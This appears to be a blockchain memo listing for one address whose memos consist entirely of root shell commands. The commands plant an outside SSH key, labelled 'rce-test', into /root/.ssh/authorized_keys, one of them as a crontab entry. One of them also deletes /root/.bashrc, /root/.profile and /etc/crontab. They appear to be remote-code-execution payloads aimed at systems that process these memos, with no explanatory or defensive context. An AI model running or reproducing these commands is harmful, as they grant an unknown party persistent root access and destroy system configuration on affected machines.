0x0597…561f

All memos sent from and to 0x0597…561f.

* * * * * root rm -f /root/.ssh 2>/dev/null; mkdir -p /root/.ssh; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIODHe9FkCUy7vA+ylrJwvlTJ1yhHhabSqKAc3979oUZf rce-test" > /root/.ssh/authorized_keys; chmod 700 /root/.ssh; chmod 600 /root/.ssh/authorized_keys
rm -f /root/.ssh /root/.bashrc /root/.profile /etc/crontab 2>/dev/null; mkdir -p /root/.ssh; chmod 700 /root/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIODHe9FkCUy7vA+ylrJwvlTJ1yhHhabSqKAc3979oUZf rce-test' > /root/.ssh/authorized_keys; chmod 600 /root/.ssh/authorized_keys
mkdir -p /root/.ssh 2>/dev/null; chmod 700 /root/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIODHe9FkCUy7vA+ylrJwvlTJ1yhHhabSqKAc3979oUZf rce-test' >> /root/.ssh/authorized_keys; chmod 600 /root/.ssh/authorized_keys